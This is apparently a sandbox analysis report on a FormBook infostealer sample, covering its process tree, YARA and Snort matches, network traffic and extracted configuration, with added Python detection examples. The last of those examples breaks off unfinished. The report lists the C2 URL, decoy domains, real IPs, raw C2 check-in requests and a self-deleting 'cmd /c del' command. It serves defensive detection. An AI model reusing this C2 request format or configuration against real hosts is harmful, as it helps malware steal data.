
Windows Analysis Report
tYEY1UeurGz0Mjb.exe

Overview

General Information

Sample name: tYEY1UeurGz0Mjb.exe
Analysis ID: 1467706
MD5: a9c37f81cd9a181dab2262d2f8456a76
SHA1: 549e7a8c8e998d3b7f85e61a7171685af231e780
SHA256: 76650fb8aeaf679cd204ca347026a67767ab8d9c27f65597b275d8d57327e096
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Unusual Parent Process For Cmd.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • tYEY1UeurGz0Mjb.exe (PID: 4196 cmdline: "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe" MD5: A9C37F81CD9A181DAB2262D2F8456A76)
    • tYEY1UeurGz0Mjb.exe (PID: 1216 cmdline: "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe" MD5: A9C37F81CD9A181DAB2262D2F8456A76)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • wlanext.exe (PID: 3876 cmdline: "C:\Windows\SysWOW64\wlanext.exe" MD5: 0D5F0A7CA2A8A47E3A26FB1CB67E118C)
          • cmd.exe (PID: 1788 cmdline: /c del "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
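The tree above, together with the Sigma event for cmd.exe further down, is the kind of chain a process-creation detector should catch: a Desktop executable re-launches itself, explorer.exe is shown under it because of the injection, a SysWOW64 binary (wlanext.exe) appears with no arguments, and cmd.exe deletes the original file. The Python below is an added example, not Joe Sandbox's or the Sigma rule's code. It rebuilds the tree from the PIDs and command lines listed above and flags two things: cmd.exe with an unexpected parent, using a short allowlist that is an assumption rather than the Sigma rule's actual list, and a `cmd /c del` whose target is the user-land origin of the process chain.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: Optional[int]   # None when the parent is not in the event set
    image: str
    cmdline: str


# Process-creation events reconstructed from the tree above. PIDs, images and command
# lines are the report's; the edge 1216 -> explorer.exe is the report's injection
# lineage rather than a real CreateProcess parent and is kept as the tree shows it.
SAMPLE_EVENTS: List[Proc] = [
    Proc(4196, None, r"C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe",
         r'"C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"'),
    Proc(1216, 4196, r"C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe",
         r'"C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"'),
    Proc(1028, 1216, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    Proc(3876, 1028, r"C:\Windows\SysWOW64\wlanext.exe", r'"C:\Windows\SysWOW64\wlanext.exe"'),
    Proc(1788, 3876, r"C:\Windows\SysWOW64\cmd.exe",
         r'/c del "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"'),
    Proc(2316, 1788, r"C:\Windows\system32\conhost.exe",
         r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

WINDOWS_DIR = "c:\\windows\\"
# Parents from which cmd.exe is ordinarily launched. Deliberately short and ASSUMED;
# it is not the parent list of the Sigma rule the report matched.
USUAL_CMD_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe",
                     "services.exe", "svchost.exe", "msiexec.exe"}
# `cmd /c del "<path>"`, quotes optional, case-insensitive.
DEL_RE = re.compile(r'^\s*/c\s+del\s+"?([^"]+?)"?\s*$', re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


class ProcessTree:
    def __init__(self, events: List[Proc]):
        self.by_pid: Dict[int, Proc] = {p.pid: p for p in events}

    def parent(self, p: Proc) -> Optional[Proc]:
        return self.by_pid.get(p.ppid) if p.ppid is not None else None

    def ancestors(self, p: Proc) -> List[Proc]:
        out, cur, seen = [], self.parent(p), {p.pid}
        while cur is not None and cur.pid not in seen:   # guard against PID-reuse loops
            out.append(cur)
            seen.add(cur.pid)
            cur = self.parent(cur)
        return out

    def origin(self, p: Proc) -> Optional[Proc]:
        """Nearest process in the chain (self first) whose image lives outside the Windows directory."""
        for proc in [p] + self.ancestors(p):
            if not proc.image.lower().startswith(WINDOWS_DIR):
                return proc
        return None


Finding = Tuple[str, int, str]   # (rule name, pid, detail)


def detect(events: List[Proc]) -> List[Finding]:
    tree = ProcessTree(events)
    findings: List[Finding] = []
    for p in events:
        if basename(p.image) != "cmd.exe":
            continue
        parent = tree.parent(p)
        if parent is not None and basename(parent.image) not in USUAL_CMD_PARENTS:
            findings.append(("unusual_cmd_parent", p.pid, basename(parent.image)))
        m = DEL_RE.match(p.cmdline)
        origin = tree.origin(p)
        if m and origin is not None and m.group(1).lower() == origin.image.lower():
            findings.append(("self_delete_of_origin", p.pid, m.group(1)))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:22} pid={pid} {detail}")
```

On the events above both rules fire for PID 1788: its parent is wlanext.exe, and the file it deletes is the image of PID 1216, the nearest non-Windows ancestor. Feeding real Sysmon event 1 records into `Proc` is a matter of mapping ProcessId, ParentProcessId, Image and CommandLine.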
Malware Configuration (FormBook, extracted):
{"C2 list": ["www.cpuk-finance.com/dy13/"], "decoy": ["manga-house.com", "kjsdhklssk51.xyz", "b0ba138.xyz", "bt365033.com", "ccbsinc.net", "mrwine.xyz", "nrxkrd527o.xyz", "hoshi.social", "1912ai.com", "serco2020.com", "byfchfyr.xyz", "imuschestvostorgov.online", "austinheafey.com", "mrdfa.club", "883106.photos", "profitablefxmarkets.com", "taini00.net", "brye.top", "ginsm.com", "sportglid.com", "hdretailllc.com", "umeshraja.com", "bum-arch.com", "carefulapp.com", "kjqlq.top", "3dsciagames.com", "520yhy.com", "magahatinu.com", "freedompopo.com", "directgaragedoor.com", "tyupok.xyz", "thecrystore.com", "camperelektrikde.shop", "soloparentconnect.com", "sonderfullcoaching.com", "jesuscrewofficial.com", "oioc.xyz", "assineunitv.com", "whysco.com", "484844.vip", "gdctus840t.top", "acc-pay.top", "bdsmnutzbar.info", "sdplat.media", "cioncarp4213.com", "facecasino2.top", "bankablebark.com", "gulerweb.online", "radheyranidailyproduct.com", "fin4d-sl.com", "northshorehousekeeping.com", "femmeteefatale.com", "d0ge6or54x07cfn.xyz", "craftwhirl.com", "kgfna.biz", "real-estate-96841.bond", "cfuhtkwo.xyz", "nestormediaproduction.com", "txglobedev.com", "kermoal.dev", "yr8gl32.vip", "bathroomremodelnearyou.today", "nearmeacupuncture.com", "chicstop.store"]}
Yara matches in memory dumps (Source, Rule, Description, Author, Strings):

Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp
  • Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  • Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  • Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
  • Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  • Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
(24 further memory-dump matches not shown in this excerpt)
Yara matches in unpacked PE files (Source, Rule, Description, Author, Strings):

Source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpack
  • Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  • Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  • Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
  • Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  • Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x17a49:$sqlite3step: 68 34 1C 7B E1
    • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
    • 0x17a78:$sqlite3text: 68 38 2A 90 C5
    • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
    • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
(5 further unpacked-PE matches not shown in this excerpt)
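The JPCERT/CC rule above keys on three five-byte sequences that each begin with 0x68, the x86 `push imm32` opcode, so the remaining four bytes of each are a little-endian immediate. That those immediates are FormBook's hashes of the sqlite3 exports named in the string identifiers is an assumption made here, not something the report states. The Python below is an added example, not the rule itself or a Joe Sandbox component: a minimal YARA-style hex-string scanner (with `??` wildcard support, which these particular strings do not need) run over a constructed buffer that plants each sequence twice, mirroring the doubled offsets the report lists, plus an `all of them` condition that is assumed rather than quoted from the rule.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Hex strings quoted from the JPCERT/CC "Formbook" rule matches above. Each is an x86
# `push imm32` (opcode 0x68); treating the immediate as an API-name hash is an ASSUMPTION.
JPCERT_FORMBOOK_STRINGS: Dict[str, str] = {
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
}


def hex_string_to_regex(hex_string: str) -> bytes:
    """Turn a YARA-style hex string ('68 ?? 1C') into a bytes regex; '??' is a wildcard byte."""
    out = []
    for tok in hex_string.split():
        if tok == "??":
            out.append(b".")
        elif re.fullmatch(r"[0-9A-Fa-f]{2}", tok):
            out.append(re.escape(bytes([int(tok, 16)])))
        else:
            raise ValueError(f"unsupported hex token: {tok!r}")
    return b"".join(out)


@dataclass(frozen=True)
class Hit:
    name: str
    offset: int
    data: bytes


def scan(buf: bytes, strings: Dict[str, str]) -> List[Hit]:
    """Every occurrence of every string, sorted by offset (the per-match view YARA reports)."""
    hits: List[Hit] = []
    for name, hex_string in strings.items():
        pattern = re.compile(hex_string_to_regex(hex_string), re.DOTALL)
        hits.extend(Hit(name, m.start(), m.group(0)) for m in pattern.finditer(buf))
    return sorted(hits, key=lambda h: (h.offset, h.name))


def rule_matches(buf: bytes, strings: Dict[str, str]) -> bool:
    """Condition ASSUMED to be 'all of them': each string must occur at least once."""
    return {h.name for h in scan(buf, strings)} == set(strings)


def push_imm32(data: bytes) -> Optional[int]:
    """Decode the little-endian immediate of an x86 `push imm32` (68 xx xx xx xx)."""
    if len(data) >= 5 and data[0] == 0x68:
        return int.from_bytes(data[1:5], "little")
    return None


def build_sample_buffer() -> bytes:
    """Constructed stand-in for a memory dump: 256 bytes of filler between two copies of
    each pattern, mirroring the doubled offsets in the report. Not real FormBook code."""
    filler = bytes(range(256))   # never has 0x68 followed by 0x34, 0x38 or 0x53
    chunks: List[bytes] = []
    for hex_string in list(JPCERT_FORMBOOK_STRINGS.values()) * 2:
        chunks += [filler, bytes.fromhex(hex_string)]
    return b"".join(chunks + [filler])


if __name__ == "__main__":
    buf = build_sample_buffer()
    for h in scan(buf, JPCERT_FORMBOOK_STRINGS):
        print(f"0x{h.offset:x}:{h.name}: {h.data.hex(' ').upper()}  imm32=0x{push_imm32(h.data):08X}")
    print("rule matches:", rule_matches(buf, JPCERT_FORMBOOK_STRINGS))
```

On the constructed buffer this reports six hits (0x100, 0x205, 0x30a and again 261 bytes later each) and decodes the immediates 0xE17B1C34, 0xC5902A38 and 0x8C7FD853. To use it on the real dump, read the `.sdmp` file named above into `buf` and compare the offsets with those the report lists.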

          System Summary

Source: Process started | Sigma rule: Unusual Parent Process For Cmd.EXE | Author: Tim Rauch
Data: Command: /c del "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe", CommandLine: /c del "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\wlanext.exe", ParentImage: C:\Windows\SysWOW64\wlanext.exe, ParentProcessId: 3876, ParentProcessName: wlanext.exe, ProcessCommandLine: /c del "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe", ProcessId: 1788, ProcessName: cmd.exe
Snort IDS alerts (all SID 2031412 "ET TROJAN FormBook CnC Checkin (GET)", protocol TCP, destination port 80, classtype "A Network Trojan was detected"), in time order:

Timestamp                  Source port  Destination
07/04/24-16:34:26.175750   49716        216.83.55.173:80
07/04/24-16:34:46.796764   49717        154.204.100.23:80
07/04/24-16:35:26.166423   49719        185.151.30.212:80
07/04/24-16:35:46.877456   49720        198.185.159.144:80
07/04/24-16:36:07.818487   49721        103.224.212.213:80
07/04/24-16:36:27.968302   49722        3.64.163.50:80
07/04/24-16:36:49.977451   49723        128.1.131.130:80
07/04/24-16:37:09.149461   49724        103.8.70.95:80
07/04/24-16:37:49.666946   49725        188.114.97.3:80
07/04/24-16:38:10.816088   49726        91.195.240.123:80
07/04/24-16:38:31.660414   49727        23.227.38.74:80

          AV Detection

Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.cpuk-finance.com/dy13/"], "decoy": ["manga-house.com", "kjsdhklssk51.xyz", "b0ba138.xyz", "bt365033.com", "ccbsinc.net", "mrwine.xyz", "nrxkrd527o.xyz", "hoshi.social", "1912ai.com", "serco2020.com", "byfchfyr.xyz", "imuschestvostorgov.online", "austinheafey.com", "mrdfa.club", "883106.photos", "profitablefxmarkets.com", "taini00.net", "brye.top", "ginsm.com", "sportglid.com", "hdretailllc.com", "umeshraja.com", "bum-arch.com", "carefulapp.com", "kjqlq.top", "3dsciagames.com", "520yhy.com", "magahatinu.com", "freedompopo.com", "directgaragedoor.com", "tyupok.xyz", "thecrystore.com", "camperelektrikde.shop", "soloparentconnect.com", "sonderfullcoaching.com", "jesuscrewofficial.com", "oioc.xyz", "assineunitv.com", "whysco.com", "484844.vip", "gdctus840t.top", "acc-pay.top", "bdsmnutzbar.info", "sdplat.media", "cioncarp4213.com", "facecasino2.top", "bankablebark.com", "gulerweb.online", "radheyranidailyproduct.com", "fin4d-sl.com", "northshorehousekeeping.com", "femmeteefatale.com", "d0ge6or54x07cfn.xyz", "craftwhirl.com", "kgfna.biz", "real-estate-96841.bond", "cfuhtkwo.xyz", "nestormediaproduction.com", "txglobedev.com", "kermoal.dev", "yr8gl32.vip", "bathroomremodelnearyou.today", "nearmeacupuncture.com", "chicstop.store"]}
Source: tYEY1UeurGz0Mjb.exe | ReversingLabs: Detection: 31%
Source: Yara match | File source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: tYEY1UeurGz0Mjb.exe | Joe Sandbox ML: detected
Source: tYEY1UeurGz0Mjb.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tYEY1UeurGz0Mjb.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: ZrEY.pdb source: tYEY1UeurGz0Mjb.exe
          Source: Binary string: wntdll.pdbUGP source: tYEY1UeurGz0Mjb.exe, 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000005.00000003.2048302242.000000000325A000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000005.00000003.2050405696.000000000340F000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: tYEY1UeurGz0Mjb.exe, tYEY1UeurGz0Mjb.exe, 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000005.00000003.2048302242.000000000325A000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000005.00000003.2050405696.000000000340F000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: tYEY1UeurGz0Mjb.exe, 00000003.00000002.2048827038.0000000001548000.00000004.00000020.00020000.00000000.sdmp, tYEY1UeurGz0Mjb.exe, 00000003.00000002.2050066314.0000000001D10000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: ZrEY.pdbSHA256 source: tYEY1UeurGz0Mjb.exe
          Source: Binary string: wlanext.pdbGCTL source: tYEY1UeurGz0Mjb.exe, 00000003.00000002.2048827038.0000000001548000.00000004.00000020.00020000.00000000.sdmp, tYEY1UeurGz0Mjb.exe, 00000003.00000002.2050066314.0000000001D10000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 4x nop then jmp 0766A8A0h | function 0_2_0766A059
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 4x nop then pop ebx | function 3_2_00407B26
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop ebx | function 5_2_00BB7B26

          Networking

Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49716 -> 216.83.55.173:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 154.204.100.23:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 185.151.30.212:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 198.185.159.144:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49721 -> 103.224.212.213:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49722 -> 3.64.163.50:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49723 -> 128.1.131.130:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49724 -> 103.8.70.95:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 188.114.97.3:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49726 -> 91.195.240.123:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 23.227.38.74:80
Source: C:\Windows\explorer.exe | Network Connect: 103.224.212.213 80
Source: C:\Windows\explorer.exe | Network Connect: 3.64.163.50 80
Source: C:\Windows\explorer.exe | Network Connect: 185.151.30.212 80
Source: C:\Windows\explorer.exe | Network Connect: 198.185.159.144 80
Source: C:\Windows\explorer.exe | Network Connect: 128.1.131.130 80
Source: C:\Windows\explorer.exe | Network Connect: 188.114.97.3 80
Source: C:\Windows\explorer.exe | Network Connect: 154.204.100.23 80
Source: C:\Windows\explorer.exe | Network Connect: 216.83.55.173 80
Source: C:\Windows\explorer.exe | Network Connect: 103.8.70.95 80
Source: Malware configuration extractor | URLs: www.cpuk-finance.com/dy13/
          Source: DNS query: www.cfuhtkwo.xyz
          Source: DNS query: www.mrwine.xyz
          Source: DNS query: www.byfchfyr.xyz
Source: global traffic | HTTP traffic detected: GET /dy13/?IR=PvB4rkoJuXXI3XrovRSl0ulB4esZJCnJeomMIIs8xluNKDV17gKdZx+EfyXB3rEjLuJx&nL=S4247TXPfxsLR HTTP/1.1 | Host: www.yr8gl32.vip | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dy13/?IR=tpMAOJT8TtRMsuChjA4iw3MPbwbvajf92oh/j4Ngt5fu8FRpUZDvCuNqhi68G9U6kaV7&nL=S4247TXPfxsLR HTTP/1.1 | Host: www.cfuhtkwo.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dy13/?IR=gDxxMnsI36st3zAAJ1+A3hDmBOM78/3mfYHyjE1VNrqBuQQdV+RDpqUMPEu2QspRuVgT&nL=S4247TXPfxsLR HTTP/1.1 | Host: www.cpuk-finance.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dy13/?IR=COXK5yT9Xx7VrCeWTqQC1HikmuY3GWnRD5VN4SaGvnHzB3wzqzXgI63okZhLDtLx1kx2&nL=S4247TXPfxsLR HTTP/1.1 | Host: www.nearmeacupuncture.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dy13/?IR=7H41Cx9M/9Klm4wO2KyYkeGFvajkB7bQdwjfmZPzOjV6ZXjzQq6V6P6jcCKZla+kGSS1&nL=S4247TXPfxsLR HTTP/1.1 | Host: www.serco2020.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dy13/?IR=nOOUddImUTrWJ0TERE8yX7QbQXzFXI1eXPVGsAvMbd1lknBUetPROzpkz9KaJDttVL7t&nL=S4247TXPfxsLR HTTP/1.1 | Host: www.mrwine.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dy13/?IR=VyXmaWdZl+jwWdNk+AMtKckYhqijILaYAxW34tQVDb7UqFANvgHXRuyONC1nPUdS4yTi&nL=S4247TXPfxsLR HTTP/1.1 | Host: www.cioncarp4213.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dy13/?IR=I05FyvQRVtD1nBL3W879G3rrifn+JaBOl79MbsgbL3I2Ix0E6XOmXaYbAYxT8R6qOP2I&nL=S4247TXPfxsLR HTTP/1.1 | Host: www.520yhy.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dy13/?IR=HpLmp5lsG/78ww7PQ+32zrfZcWzFIxQC5ZchK1XnBOU/XUWwZI280oPADrvVA1p9LOCI&nL=S4247TXPfxsLR HTTP/1.1 | Host: www.txglobedev.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 198.185.159.144
Source: Joe Sandbox View | IP Address: 103.224.212.213
Source: Joe Sandbox View | ASN Name: SQUARESPACEUS
Source: Joe Sandbox View | ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU
Source: Joe Sandbox View | ASN Name: UHGL-AS-APUCloudHKHoldingsGroupLimitedHK
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
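Every request above has the same shape: a GET to one short directory (/dy13/), two query parameters with two-letter names (a long base64-looking IR= value and a short nL= token), a Host taken in turn from the extracted configuration, Connection: close, and no User-Agent, which is what the "HTTP GET or POST without a user agent" signature fires on. Only www.cpuk-finance.com appears in the config's C2 list; the other hosts are decoys. The Python below is an added example, not Joe Sandbox's or the Snort rule's logic: it parses raw request text, scores those indicators (the regexes and the threshold of three are assumptions tuned on this one sample) and labels each Host against the extracted config. The request log is constructed: two check-ins copied from the traffic above plus two ordinary requests for contrast.

```python
import re
from typing import Dict, List, Tuple

# Extracted configuration as the report prints it (decoy list shortened to the hosts seen).
FORMBOOK_CONFIG: Dict[str, List[str]] = {
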